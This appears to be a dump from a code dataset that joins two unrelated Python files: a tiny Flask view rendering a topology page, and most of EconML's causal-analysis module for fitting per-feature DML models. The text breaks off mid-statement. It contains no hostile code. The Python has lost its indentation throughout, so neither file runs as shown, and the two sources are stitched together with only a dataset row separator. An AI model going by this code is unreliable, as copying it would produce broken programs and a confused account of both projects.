# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import render_template, request
import view_base
class IndexView(view_base.ViewBase):
def __init__(self):
super(IndexView, self).__init__()
def run(self):
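        # NOTE: this assumes the Host header always carries an explicit port
        # (e.g. "127.0.0.1:8080"); a bare host name would make the unpacking
        # below raise a ValueError.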
host, port = request.host.split(':')
return render_template('topology.html', host=host, port=port)
|
econml/solutions/causal_analysis/_causal_analysis.py | huigangchen/EconML | 1,846 | 17041 | <filename>econml/solutions/causal_analysis/_causal_analysis.py
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""Module for assessing causal feature importance."""
import warnings
from collections import OrderedDict, namedtuple
import joblib
import lightgbm as lgb
from numba.core.utils import erase_traceback
import numpy as np
from numpy.lib.function_base import iterable
import pandas as pd
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.compose import ColumnTransformer
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier, RandomForestRegressor
from sklearn.linear_model import Lasso, LassoCV, LogisticRegression, LogisticRegressionCV
from sklearn.pipeline import make_pipeline, Pipeline
from sklearn.preprocessing import OneHotEncoder, PolynomialFeatures, StandardScaler
from sklearn.tree import _tree
from sklearn.utils.validation import column_or_1d
from ...cate_interpreter import SingleTreeCateInterpreter, SingleTreePolicyInterpreter
from ...dml import LinearDML, CausalForestDML
from ...inference import NormalInferenceResults
from ...sklearn_extensions.linear_model import WeightedLasso
from ...sklearn_extensions.model_selection import GridSearchCVList
from ...utilities import _RegressionWrapper, inverse_onehot
# TODO: this utility is documented but internal; reimplement?
from sklearn.utils import _safe_indexing
# TODO: this utility is even less public...
from sklearn.utils import _get_column_indices
class _CausalInsightsConstants:
RawFeatureNameKey = 'raw_name'
EngineeredNameKey = 'name'
CategoricalColumnKey = 'cat'
TypeKey = 'type'
PointEstimateKey = 'point'
StandardErrorKey = 'stderr'
ZStatKey = 'zstat'
ConfidenceIntervalLowerKey = 'ci_lower'
ConfidenceIntervalUpperKey = 'ci_upper'
PValueKey = 'p_value'
Version = 'version'
CausalComputationTypeKey = 'causal_computation_type'
ConfoundingIntervalKey = 'confounding_interval'
ViewKey = 'view'
InitArgsKey = 'init_args'
RowData = 'row_data' # NOTE: RowData is mutually exclusive with the other data columns
ALL = [RawFeatureNameKey,
EngineeredNameKey,
CategoricalColumnKey,
TypeKey,
PointEstimateKey,
StandardErrorKey,
ZStatKey,
ConfidenceIntervalLowerKey,
ConfidenceIntervalUpperKey,
PValueKey,
Version,
CausalComputationTypeKey,
ConfoundingIntervalKey,
ViewKey,
InitArgsKey,
RowData]
def _get_default_shared_insights_output():
"""
    Dictionary elements shared among all analyses.
    For breaking changes to this dictionary's output, the major version of the
    dictionary should be updated; for non-breaking changes, the minor version
    should be updated.
"""
return {
_CausalInsightsConstants.RawFeatureNameKey: [],
_CausalInsightsConstants.EngineeredNameKey: [],
_CausalInsightsConstants.CategoricalColumnKey: [],
_CausalInsightsConstants.TypeKey: [],
_CausalInsightsConstants.Version: '1.0',
_CausalInsightsConstants.CausalComputationTypeKey: "simple",
_CausalInsightsConstants.ConfoundingIntervalKey: None,
_CausalInsightsConstants.InitArgsKey: {}
}
def _get_default_specific_insights(view):
# keys should be mutually exclusive with shared keys, so that the dictionaries can be cleanly merged
return {
_CausalInsightsConstants.PointEstimateKey: [],
_CausalInsightsConstants.StandardErrorKey: [],
_CausalInsightsConstants.ZStatKey: [],
_CausalInsightsConstants.ConfidenceIntervalLowerKey: [],
_CausalInsightsConstants.ConfidenceIntervalUpperKey: [],
_CausalInsightsConstants.PValueKey: [],
_CausalInsightsConstants.ViewKey: view
}
def _get_metadata_causal_insights_keys():
return [_CausalInsightsConstants.Version,
_CausalInsightsConstants.CausalComputationTypeKey,
_CausalInsightsConstants.ConfoundingIntervalKey,
_CausalInsightsConstants.ViewKey]
def _get_column_causal_insights_keys():
return [_CausalInsightsConstants.RawFeatureNameKey,
_CausalInsightsConstants.EngineeredNameKey,
_CausalInsightsConstants.CategoricalColumnKey,
_CausalInsightsConstants.TypeKey]
def _get_data_causal_insights_keys():
return [_CausalInsightsConstants.PointEstimateKey,
_CausalInsightsConstants.StandardErrorKey,
_CausalInsightsConstants.ZStatKey,
_CausalInsightsConstants.ConfidenceIntervalLowerKey,
_CausalInsightsConstants.ConfidenceIntervalUpperKey,
_CausalInsightsConstants.PValueKey]
def _first_stage_reg(X, y, *, automl=True, random_state=None, verbose=0):
if automl:
model = GridSearchCVList([LassoCV(random_state=random_state),
RandomForestRegressor(
n_estimators=100, random_state=random_state, min_samples_leaf=10),
lgb.LGBMRegressor(num_leaves=32, random_state=random_state)],
param_grid_list=[{},
{'min_weight_fraction_leaf':
[.001, .01, .1]},
{'learning_rate': [0.1, 0.3], 'max_depth': [3, 5]}],
cv=3,
scoring='r2',
verbose=verbose)
best_est = model.fit(X, y).best_estimator_
if isinstance(best_est, LassoCV):
return Lasso(alpha=best_est.alpha_, random_state=random_state)
else:
return best_est
else:
model = LassoCV(cv=5, random_state=random_state).fit(X, y)
return Lasso(alpha=model.alpha_, random_state=random_state)
def _first_stage_clf(X, y, *, make_regressor=False, automl=True, min_count=None, random_state=None, verbose=0):
# use same Cs as would be used by default by LogisticRegressionCV
cs = np.logspace(-4, 4, 10)
if min_count is None:
min_count = _CAT_LIMIT # we have at least this many instances
if automl:
# NOTE: we don't use LogisticRegressionCV inside the grid search because of the nested stratification
# which could affect how many times each distinct Y value needs to be present in the data
model = GridSearchCVList([LogisticRegression(max_iter=1000,
random_state=random_state),
RandomForestClassifier(n_estimators=100, min_samples_leaf=10,
random_state=random_state),
lgb.LGBMClassifier(num_leaves=32, random_state=random_state)],
param_grid_list=[{'C': cs},
{'max_depth': [3, None],
'min_weight_fraction_leaf': [.001, .01, .1]},
{'learning_rate': [0.1, 0.3], 'max_depth': [3, 5]}],
cv=min(3, min_count),
scoring='neg_log_loss',
verbose=verbose)
est = model.fit(X, y).best_estimator_
else:
model = LogisticRegressionCV(
cv=min(5, min_count), max_iter=1000, Cs=cs, random_state=random_state).fit(X, y)
est = LogisticRegression(C=model.C_[0], max_iter=1000, random_state=random_state)
if make_regressor:
return _RegressionWrapper(est)
else:
return est
def _final_stage(*, random_state=None, verbose=0):
return GridSearchCVList([WeightedLasso(random_state=random_state),
RandomForestRegressor(n_estimators=100, random_state=random_state, verbose=verbose)],
param_grid_list=[{'alpha': [.001, .01, .1, 1, 10]},
{'max_depth': [3, 5],
'min_samples_leaf': [10, 50]}],
cv=3,
scoring='neg_mean_squared_error',
verbose=verbose)
# simplification of sklearn's ColumnTransformer that encodes categoricals and passes through selected other columns
# but also supports get_feature_names with expected signature
class _ColumnTransformer(TransformerMixin):
def __init__(self, categorical, passthrough):
self.categorical = categorical
self.passthrough = passthrough
def fit(self, X):
cat_cols = _safe_indexing(X, self.categorical, axis=1)
if cat_cols.shape[1] > 0:
self.has_cats = True
# NOTE: set handle_unknown to 'ignore' so that we don't throw at runtime if given a novel value
self.one_hot_encoder = OneHotEncoder(sparse=False,
handle_unknown='ignore').fit(cat_cols)
else:
self.has_cats = False
self.d_x = X.shape[1]
return self
def transform(self, X):
rest = _safe_indexing(X, self.passthrough, axis=1)
if self.has_cats:
cats = self.one_hot_encoder.transform(_safe_indexing(X, self.categorical, axis=1))
# NOTE: we rely on the passthrough columns coming first in the concatenated X;W
# when we pipeline scaling with our first stage models later, so the order here is important
return np.hstack((rest, cats))
else:
return rest
def get_feature_names(self, names=None):
if names is None:
names = [f"x{i}" for i in range(self.d_x)]
rest = _safe_indexing(names, self.passthrough, axis=0)
if self.has_cats:
cats = self.one_hot_encoder.get_feature_names(
_safe_indexing(names, self.categorical, axis=0))
return np.concatenate((rest, cats))
else:
return rest
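# Minimal usage sketch of the _ColumnTransformer above (illustrative only, never called):
# the categorical column indices are one-hot encoded with unknown values ignored, while
# the passthrough indices are forwarded unchanged and come first in the transformed output.
def _example_column_transformer_usage():
    X = np.array([[0.5, 'a'], [1.5, 'b'], [2.5, 'a']], dtype=object)
    ct = _ColumnTransformer(categorical=[1], passthrough=[0]).fit(X)
    return ct.transform(X), ct.get_feature_names(['num_col', 'cat_col'])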
# Wrapper to make sure that we get a deep copy of the contents instead of clone returning an untrained copy
class _Wrapper:
def __init__(self, item):
self.item = item
class _FrozenTransformer(TransformerMixin, BaseEstimator):
def __init__(self, wrapper):
self.wrapper = wrapper
def fit(self, X, y):
return self
def transform(self, X):
return self.wrapper.item.transform(X)
def _freeze(transformer):
return _FrozenTransformer(_Wrapper(transformer))
# Convert python objects to (possibly nested) types that can easily be represented as literals
def _sanitize(obj):
if obj is None or isinstance(obj, (bool, int, str, float)):
return obj
elif isinstance(obj, dict):
return {_sanitize(key): _sanitize(obj[key]) for key in obj}
else:
try:
return [_sanitize(item) for item in obj]
except Exception:
raise ValueError(f"Could not sanitize input {obj}")
# Convert SingleTreeInterpreter to a python dictionary
def _tree_interpreter_to_dict(interp, features, leaf_data=lambda t, n: {}):
tree = interp.tree_model_.tree_
node_dict = interp.node_dict_
def recurse(node_id):
if tree.children_left[node_id] == _tree.TREE_LEAF:
return {'leaf': True, 'n_samples': tree.n_node_samples[node_id], **leaf_data(tree, node_id, node_dict)}
else:
return {'leaf': False, 'feature': features[tree.feature[node_id]], 'threshold': tree.threshold[node_id],
'left': recurse(tree.children_left[node_id]),
'right': recurse(tree.children_right[node_id])}
return recurse(0)
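# Illustrative sketch of the nested dictionary produced by _tree_interpreter_to_dict above
# (the values shown are hypothetical): internal nodes carry 'feature', 'threshold', 'left'
# and 'right', while leaves carry 'n_samples' plus whatever the leaf_data callback adds.
_EXAMPLE_TREE_DICT = {
    'leaf': False, 'feature': 'x0', 'threshold': 0.5,
    'left': {'leaf': True, 'n_samples': 120},
    'right': {'leaf': True, 'n_samples': 80},
}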
class _PolicyOutput:
"""
A type encapsulating various information related to a learned policy.
Attributes
----------
tree_dictionary:dict
The policy tree represented as a dictionary,
policy_value:float
The average value of applying the recommended policy (over using the control),
always_treat:dict of string to float
A dictionary mapping each non-control treatment to the value of always treating with it (over control),
control_name:string
The name of the control treatment
"""
def __init__(self, tree_dictionary, policy_value, always_treat, control_name):
self.tree_dictionary = tree_dictionary
self.policy_value = policy_value
self.always_treat = always_treat
self.control_name = control_name
# named tuple type for storing results inside CausalAnalysis class;
# must be lifted to module level to enable pickling
_result = namedtuple("_result", field_names=[
"feature_index", "feature_name", "feature_baseline", "feature_levels", "hinds",
"X_transformer", "W_transformer", "estimator", "global_inference", "treatment_value"])
def _process_feature(name, feat_ind, verbose, categorical_inds, categories, heterogeneity_inds, min_counts, y, X,
nuisance_models, h_model, random_state, model_y, cv, mc_iters):
try:
if verbose > 0:
print(f"CausalAnalysis: Feature {name}")
discrete_treatment = feat_ind in categorical_inds
if discrete_treatment:
cats = categories[categorical_inds.index(feat_ind)]
else:
cats = 'auto' # just leave the setting at the default otherwise
# the transformation logic here is somewhat tricky; we always need to encode the categorical columns,
# whether they end up in X or in W. However, for the continuous columns, we want to scale them all
# when running the first stage models, but don't want to scale the X columns when running the final model,
# since then our coefficients will have odd units and our trees will also have decisions using those units.
#
# we achieve this by pipelining the X scaling with the Y and T models (with fixed scaling, not refitting)
hinds = heterogeneity_inds[feat_ind]
WX_transformer = ColumnTransformer([('encode', OneHotEncoder(drop='first', sparse=False),
[ind for ind in categorical_inds
if ind != feat_ind]),
('drop', 'drop', feat_ind)],
remainder=StandardScaler())
W_transformer = ColumnTransformer([('encode', OneHotEncoder(drop='first', sparse=False),
[ind for ind in categorical_inds
if ind != feat_ind and ind not in hinds]),
('drop', 'drop', hinds),
('drop_feat', 'drop', feat_ind)],
remainder=StandardScaler())
X_cont_inds = [ind for ind in hinds
if ind != feat_ind and ind not in categorical_inds]
# Use _ColumnTransformer instead of ColumnTransformer so we can get feature names
X_transformer = _ColumnTransformer([ind for ind in categorical_inds
if ind != feat_ind and ind in hinds],
X_cont_inds)
# Controls are all other columns of X
WX = WX_transformer.fit_transform(X)
# can't use X[:, feat_ind] when X is a DataFrame
T = _safe_indexing(X, feat_ind, axis=1)
# TODO: we can't currently handle unseen values of the feature column when getting the effect;
# we might want to modify OrthoLearner (and other discrete treatment classes)
# so that the user can opt-in to allowing unseen treatment values
# (and return NaN or something in that case)
W = W_transformer.fit_transform(X)
X_xf = X_transformer.fit_transform(X)
# HACK: this is slightly ugly because we rely on the fact that DML passes [X;W] to the first stage models
# and so we can just peel the first columns off of that combined array for rescaling in the pipeline
        # TODO: consider adding an API to DML that allows for better understanding of how the nuisance inputs are
# built, such as model_y_feature_names, model_t_feature_names, model_y_transformer, etc., so that this
# becomes a valid approach to handling this
X_scaler = ColumnTransformer([('scale', StandardScaler(),
list(range(len(X_cont_inds))))],
remainder='passthrough').fit(np.hstack([X_xf, W])).named_transformers_['scale']
X_scaler_fixed = ColumnTransformer([('scale', _freeze(X_scaler),
list(range(len(X_cont_inds))))],
remainder='passthrough')
if W.shape[1] == 0:
# array checking routines don't accept 0-width arrays
W = None
if X_xf.shape[1] == 0:
X_xf = None
if verbose > 0:
print("CausalAnalysis: performing model selection on T model")
# perform model selection
model_t = (_first_stage_clf(WX, T, automl=nuisance_models == 'automl',
min_count=min_counts.get(feat_ind, None),
random_state=random_state, verbose=verbose)
if discrete_treatment else _first_stage_reg(WX, T, automl=nuisance_models == 'automl',
random_state=random_state,
verbose=verbose))
pipelined_model_t = Pipeline([('scale', X_scaler_fixed),
('model', model_t)])
pipelined_model_y = Pipeline([('scale', X_scaler_fixed),
('model', model_y)])
if X_xf is None and h_model == 'forest':
warnings.warn(f"Using a linear model instead of a forest model for feature '{name}' "
"because forests don't support models with no heterogeneity indices")
h_model = 'linear'
if h_model == 'linear':
est = LinearDML(model_y=pipelined_model_y,
model_t=pipelined_model_t,
discrete_treatment=discrete_treatment,
fit_cate_intercept=True,
linear_first_stages=False,
categories=cats,
random_state=random_state,
cv=cv,
mc_iters=mc_iters)
elif h_model == 'forest':
est = CausalForestDML(model_y=pipelined_model_y,
model_t=pipelined_model_t,
discrete_treatment=discrete_treatment,
n_estimators=4000,
min_var_leaf_on_val=True,
categories=cats,
random_state=random_state,
verbose=verbose,
cv=cv,
mc_iters=mc_iters)
if verbose > 0:
print("CausalAnalysis: tuning forest")
est.tune(y, T, X=X_xf, W=W)
if verbose > 0:
print("CausalAnalysis: training causal model")
est.fit(y, T, X=X_xf, W=W, cache_values=True)
# Prefer ate__inference to const_marginal_ate_inference(X) because it is doubly-robust and not conservative
if h_model == 'forest' and discrete_treatment:
global_inference = est.ate__inference()
else:
# convert to NormalInferenceResults for consistency
inf = est.const_marginal_ate_inference(X=X_xf)
global_inference = NormalInferenceResults(d_t=inf.d_t, d_y=inf.d_y,
pred=inf.mean_point,
pred_stderr=inf.stderr_mean,
mean_pred_stderr=None,
inf_type='ate')
# Set the dictionary values shared between local and global summaries
if discrete_treatment:
cats = est.transformer.categories_[0]
baseline = cats[est.transformer.drop_idx_[0]]
cats = cats[np.setdiff1d(np.arange(len(cats)),
est.transformer.drop_idx_[0])]
d_t = len(cats)
insights = {
_CausalInsightsConstants.TypeKey: ['cat'] * d_t,
_CausalInsightsConstants.RawFeatureNameKey: [name] * d_t,
_CausalInsightsConstants.CategoricalColumnKey: cats.tolist(),
_CausalInsightsConstants.EngineeredNameKey: [
f"{name} (base={baseline}): {c}" for c in cats]
}
treatment_value = 1
else:
d_t = 1
cats = ["num"]
baseline = None
insights = {
_CausalInsightsConstants.TypeKey: ["num"],
_CausalInsightsConstants.RawFeatureNameKey: [name],
_CausalInsightsConstants.CategoricalColumnKey: [name],
_CausalInsightsConstants.EngineeredNameKey: [name]
}
# calculate a "typical" treatment value, using the mean of the absolute value of non-zero treatments
treatment_value = np.mean(np.abs(T[T != 0]))
result = _result(feature_index=feat_ind,
feature_name=name,
feature_baseline=baseline,
feature_levels=cats,
hinds=hinds,
X_transformer=X_transformer,
W_transformer=W_transformer,
estimator=est,
global_inference=global_inference,
treatment_value=treatment_value)
return insights, result
except Exception as e:
return e
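# Minimal sketch (illustrative only, not used by CausalAnalysis) of the "freeze" pattern
# applied in _process_feature above: a scaler is fit once up front and then wrapped with
# _freeze so that, inside the per-fold nuisance pipelines, it is reused as-is rather than
# being refit on each fold.
def _example_frozen_scaler_pipeline(X_cont, nuisance_model):
    scaler = StandardScaler().fit(X_cont)
    return Pipeline([('scale', _freeze(scaler)),
                     ('model', nuisance_model)])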
# Unless we're opting into minimal cross-fitting, this is the minimum number of instances of each category
# required to fit a discrete DML model
_CAT_LIMIT = 10
class CausalAnalysis:
"""
Note: this class is experimental and the API may evolve over our next few releases.
Gets causal importance of features.
Parameters
----------
feature_inds: array-like of int, str, or bool
The features for which to estimate causal effects, expressed as either column indices,
column names, or boolean flags indicating which columns to pick
categorical: array-like of int, str, or bool
The features which are categorical in nature, expressed as either column indices,
column names, or boolean flags indicating which columns to pick
heterogeneity_inds: array-like of int, str, or bool, or None or list of array-like elements or None, default None
If a 1d array, then whenever estimating a heterogeneous (local) treatment effect
model, then only the features in this array will be used for heterogeneity. If a 2d
array then its first dimension should be len(feature_inds) and whenever estimating
a local causal effect for target feature feature_inds[i], then only features in
heterogeneity_inds[i] will be used for heterogeneity. If heterogeneity_inds[i]=None, then all features
are used for heterogeneity when estimating local causal effect for feature_inds[i], and likewise if
        heterogeneity_inds[i]=[] then no features will be used for heterogeneity. If heterogeneity_inds=None
then all features are used for heterogeneity for all features, and if heterogeneity_inds=[] then
no features will be.
feature_names: list of str, default None
The names for all of the features in the data. Not necessary if the input will be a dataframe.
If None and the input is a plain numpy array, generated feature names will be ['X1', 'X2', ...].
upper_bound_on_cat_expansion: int, default 5
The maximum number of categorical values allowed, because they are expanded via one-hot encoding. If a
feature has more than this many values, then a causal effect model is not fitted for that target feature
and a warning flag is raised. The remainder of the models are fitted.
classification: bool, default False
Whether this is a classification (as opposed to regression) task
TODO. Enable also multi-class classification (post-MVP)
nuisance_models: one of {'linear', 'automl'}, optional (default='linear')
What models to use for nuisance estimation (i.e. for estimating propensity models or models of how
controls predict the outcome). If 'linear', then LassoCV (for regression) and LogisticRegressionCV
(for classification) are used. If 'automl', then a kfold cross-validation and model selection is performed
among several models and the best is chosen.
TODO. Add other options, such as {'azure_automl', 'forests', 'boosting'} that will use particular sub-cases
of models or also integrate with azure autoML. (post-MVP)
heterogeneity_model: one of {'linear', 'forest'}, optional (default='linear')
What type of model to use for treatment effect heterogeneity. 'linear' means that a heterogeneity model
of the form theta(X)=<a, X> will be used, while 'forest' means that a forest model will be trained instead.
TODO. Add other options, such as {'automl'} for performing
model selection for the causal effect, or {'sparse_linear'} for using a debiased lasso. (post-MVP)
categories: 'auto' or list of ('auto' or list of values), default 'auto'
What categories to use for the categorical columns. If 'auto', then the categories will be inferred for
all categorical columns; otherwise this argument should have as many entries as there are categorical columns,
and each entry should be either 'auto' to infer the values for that column or the list of values for the
column. If explicit values are provided, the first value is treated as the "control" value for that column
against which other values are compared.
n_jobs: int, default -1
Degree of parallelism to use when training models via joblib.Parallel
verbose : int, default=0
Controls the verbosity when fitting and predicting.
cv: int, cross-validation generator or an iterable, default 5
Determines the strategy for cross-fitting used when training causal models for each feature.
Possible inputs for cv are:
- integer, to specify the number of folds.
- :term:`CV splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
mc_iters: int, default 3
The number of times to rerun the first stage models to reduce the variance of the causal model nuisances.
skip_cat_limit_checks: bool, default False
By default, categorical features need to have several instances of each category in order for a model to be
fit robustly. Setting this to True will skip these checks (although at least 2 instances will always be
required for linear heterogeneity models, and 4 for forest heterogeneity models even in that case).
random_state : int, RandomState instance or None, default=None
Controls the randomness of the estimator. The features are always
randomly permuted at each split. When ``max_features < n_features``, the algorithm will
select ``max_features`` at random at each split before finding the best
split among them. But the best found split may vary across different
runs, even if ``max_features=n_features``. That is the case, if the
improvement of the criterion is identical for several splits and one
split has to be selected at random. To obtain a deterministic behaviour
during fitting, ``random_state`` has to be fixed to an integer.
Attributes
----------
nuisance_models_: string
The nuisance models setting used for the most recent call to fit
heterogeneity_model: string
The heterogeneity model setting used for the most recent call to fit
feature_names_: list of string
The list of feature names from the data in the most recent call to fit
trained_feature_indices_: list of int
The list of feature indices where models were trained successfully
untrained_feature_indices_: list of tuple of (int, string or Exception)
        The list of indices that were requested but not able to be trained successfully,
along with either a reason or caught Exception for each
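    Examples
    --------
    A minimal usage sketch (the feature/column choices below are hypothetical)::

        analysis = CausalAnalysis(feature_inds=[0, 1, 2],
                                  categorical=[2],
                                  classification=False,
                                  nuisance_models='linear',
                                  heterogeneity_model='linear')
        analysis.fit(X, y)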
"""
def __init__(self, feature_inds, categorical, heterogeneity_inds=None, feature_names=None, classification=False,
upper_bound_on_cat_expansion=5, nuisance_models='linear', heterogeneity_model='linear', *,
categories='auto', n_jobs=-1, verbose=0, cv=5, mc_iters=3, skip_cat_limit_checks=False,
random_state=None):
self.feature_inds = feature_inds
self.categorical = categorical
self.heterogeneity_inds = heterogeneity_inds
self.feature_names = feature_names
self.classification = classification
self.upper_bound_on_cat_expansion = upper_bound_on_cat_expansion
self.nuisance_models = nuisance_models
self.heterogeneity_model = heterogeneity_model
self.categories = categories
self.n_jobs = n_jobs
self.verbose = verbose
self.cv = cv
self.mc_iters = mc_iters
self.skip_cat_limit_checks = skip_cat_limit_checks
self.random_state = random_state
def fit(self, X, y, warm_start=False):
"""
Fits global and local causal effect models for each feature in feature_inds on the data
Parameters
----------
X : array-like
Feature data
y : array-like of shape (n,) or (n,1)
            Outcome. If classification=True, then y should take exactly two values; otherwise an error is raised,
            since only binary classification is implemented for now.
TODO. enable multi-class classification for y (post-MVP)
warm_start : boolean, default False
If False, train models for each feature in `feature_inds`.
If True, train only models for features in `feature_inds` that had not already been trained by
            the previous call to `fit`, and for which neither the corresponding heterogeneity_inds nor the
            automl flag has changed. If heterogeneity_inds have changed, then the final stage model of these features
            will be refit. If the automl flag has changed, then the whole model is refit, despite the warm start flag.
"""
# Validate inputs
assert self.nuisance_models in ['automl', 'linear'], (
"The only supported nuisance models are 'linear' and 'automl', "
f"but was given {self.nuisance_models}")
assert self.heterogeneity_model in ['linear', 'forest'], (
"The only supported heterogeneity models are 'linear' and 'forest' but received "
f"{self.heterogeneity_model}")
assert np.ndim(X) == 2, f"X must be a 2-dimensional array, but here had shape {np.shape(X)}"
assert iterable(self.feature_inds), f"feature_inds should be array-like, but got {self.feature_inds}"
assert iterable(self.categorical), f"categorical should be array-like, but got {self.categorical}"
assert self.heterogeneity_inds is None or iterable(self.heterogeneity_inds), (
f"heterogeneity_inds should be None or array-like, but got {self.heterogeneity_inds}")
assert self.feature_names is None or iterable(self.feature_names), (
f"feature_names should be None or array-like, but got {self.feature_names}")
assert self.categories == 'auto' or iterable(self.categories), (
f"categories should be 'auto' or array-like, but got {self.categories}")
# TODO: check compatibility of X and Y lengths
if warm_start:
if not hasattr(self, "_results"):
# no previous fit, cancel warm start
warm_start = False
elif self._d_x != X.shape[1]:
raise ValueError(
f"Can't warm start: previous X had {self._d_x} columns, new X has {X.shape[1]} columns")
# work with numeric feature indices, so that we can easily compare with categorical ones
train_inds = _get_column_indices(X, self.feature_inds)
if len(train_inds) == 0:
raise ValueError(
"No features specified. At least one feature index must be specified so that a model can be trained.")
heterogeneity_inds = self.heterogeneity_inds
if heterogeneity_inds is None:
heterogeneity_inds = [None for ind in train_inds]
# if heterogeneity_inds is 1D, repeat it
if heterogeneity_inds == [] or isinstance(heterogeneity_inds[0], (int, str, bool)):
heterogeneity_inds = [heterogeneity_inds for _ in train_inds]
# heterogeneity inds should be a 2D list of length same as train_inds
elif heterogeneity_inds is not None and len(heterogeneity_inds) != len(train_inds):
raise ValueError("Heterogeneity indexes should have the same number of entries, but here "
f" there were {len(heterogeneity_inds)} heterogeneity entries but "
f" {len(train_inds)} feature indices.")
# replace None elements of heterogeneity_inds and ensure indices are numeric
heterogeneity_inds = {ind: list(range(X.shape[1])) if hinds is None else _get_column_indices(X, hinds)
for ind, hinds in zip(train_inds, heterogeneity_inds)}
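        # Illustrative note (comment only): after this normalization heterogeneity_inds is a dict keyed by
        # numeric feature index. For example, with a 3-column X, train_inds == [0, 2] and a per-feature input
        # of [None, [1]], the result is {0: [0, 1, 2], 2: [1]}, i.e. a feature with no explicit heterogeneity
        # columns uses every column of X as a potential effect modifier.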
if warm_start:
train_y_model = False
if self.nuisance_models != self.nuisance_models_:
warnings.warn("warm_start will be ignored since the nuisance models have changed "
f"from {self.nuisance_models_} to {self.nuisance_models} since the previous call to fit")
warm_start = False
train_y_model = True
if self.heterogeneity_model != self.heterogeneity_model_:
warnings.warn("warm_start will be ignored since the heterogeneity model has changed "
f"from {self.heterogeneity_model_} to {self.heterogeneity_model} "
"since the previous call to fit")
warm_start = False
# TODO: bail out also if categorical columns, classification, random_state changed?
else:
train_y_model = True
# TODO: should we also train a new model_y under any circumstances when warm_start is True?
if warm_start:
new_inds = [ind for ind in train_inds if (ind not in self._cache or
heterogeneity_inds[ind] != self._cache[ind][1].hinds)]
else:
new_inds = list(train_inds)
self._cache = {} # store mapping from feature to insights, results
# train the Y model
if train_y_model:
# perform model selection for the Y model using all X, not on a per-column basis
allX = ColumnTransformer([('encode',
OneHotEncoder(
drop='first', sparse=False),
self.categorical)],
remainder=StandardScaler()).fit_transform(X)
if self.verbose > 0:
print("CausalAnalysis: performing model selection on overall Y model")
if self.classification:
self._model_y = _first_stage_clf(allX, y, automl=self.nuisance_models == 'automl',
make_regressor=True,
random_state=self.random_state, verbose=self.verbose)
else:
self._model_y = _first_stage_reg(allX, y, automl=self.nuisance_models == 'automl',
random_state=self.random_state, verbose=self.verbose)
if self.classification:
# now that we've trained the classifier and wrapped it, ensure that y is transformed to
# work with the regression wrapper
# we use column_or_1d to treat pd.Series and pd.DataFrame objects the same way as arrays
y = column_or_1d(y).reshape(-1, 1)
# note that this needs to happen after wrapping to generalize to the multi-class case,
# since otherwise we'll have too many columns to be able to train a classifier
y = OneHotEncoder(drop='first', sparse=False).fit_transform(y)
assert y.ndim == 1 or y.shape[1] == 1, ("Multiclass classification isn't supported" if self.classification
else "Only a single outcome is supported")
self._vec_y = y.ndim == 1
self._d_x = X.shape[1]
# start with empty results and default shared insights
self._results = []
self._shared = _get_default_shared_insights_output()
self._shared[_CausalInsightsConstants.InitArgsKey] = {
'feature_inds': _sanitize(self.feature_inds),
'categorical': _sanitize(self.categorical),
'heterogeneity_inds': _sanitize(self.heterogeneity_inds),
'feature_names': _sanitize(self.feature_names),
'classification': _sanitize(self.classification),
'upper_bound_on_cat_expansion': _sanitize(self.upper_bound_on_cat_expansion),
'nuisance_models': _sanitize(self.nuisance_models),
'heterogeneity_model': _sanitize(self.heterogeneity_model),
'categories': _sanitize(self.categories),
'n_jobs': _sanitize(self.n_jobs),
'verbose': _sanitize(self.verbose),
'random_state': _sanitize(self.random_state)
}
# convert categorical indicators to numeric indices
categorical_inds = _get_column_indices(X, self.categorical)
categories = self.categories
if categories == 'auto':
categories = ['auto' for _ in categorical_inds]
else:
assert len(categories) == len(categorical_inds), (
"If categories is not 'auto', it must contain one entry per categorical column. Instead, categories"
f"has length {len(categories)} while there are {len(categorical_inds)} categorical columns.")
# check for indices over the categorical expansion bound
invalid_inds = getattr(self, 'untrained_feature_indices_', [])
# assume we'll be able to train former failures this time; we'll add them back if not
invalid_inds = [(ind, reason) for (ind, reason) in invalid_inds if ind not in new_inds]
self._has_column_names = True
if self.feature_names is None:
if hasattr(X, "iloc"):
feature_names = X.columns
else:
self._has_column_names = False
feature_names = [f"x{i}" for i in range(X.shape[1])]
else:
feature_names = self.feature_names
self.feature_names_ = feature_names
min_counts = {}
for ind in new_inds:
column_text = self._format_col(ind)
if ind in categorical_inds:
cats, counts = np.unique(_safe_indexing(X, ind, axis=1), return_counts=True)
min_ind = np.argmin(counts)
n_cat = len(cats)
if n_cat > self.upper_bound_on_cat_expansion:
warnings.warn(f"{column_text} has more than {self.upper_bound_on_cat_expansion} "
f"values (found {n_cat}) so no heterogeneity model will be fit for it; "
"increase 'upper_bound_on_cat_expansion' to change this behavior.")
# can't remove in place while iterating over new_inds, so store in separate list
invalid_inds.append((ind, 'upper_bound_on_cat_expansion'))
elif counts[min_ind] < _CAT_LIMIT:
if self.skip_cat_limit_checks and (counts[min_ind] >= 5 or
(counts[min_ind] >= 2 and
self.heterogeneity_model != 'forest')):
# train the model, but warn
warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "
f"the training dataset, which is less than the lower limit ({_CAT_LIMIT}). "
"A model will still be fit because 'skip_cat_limit_checks' is True, "
"but this model may not be robust.")
min_counts[ind] = counts[min_ind]
elif counts[min_ind] < 2 or (counts[min_ind] < 5 and self.heterogeneity_model == 'forest'):
# no model can be trained in this case since we need more folds
warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "
"the training dataset, but linear heterogeneity models need at least 2 and "
"forest heterogeneity models need at least 5 instances, so no model will be fit "
"for this column")
invalid_inds.append((ind, 'cat_limit'))
else:
                        # don't train a model, but suggest a workaround since there are enough instances of the
                        # least populated class
warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "
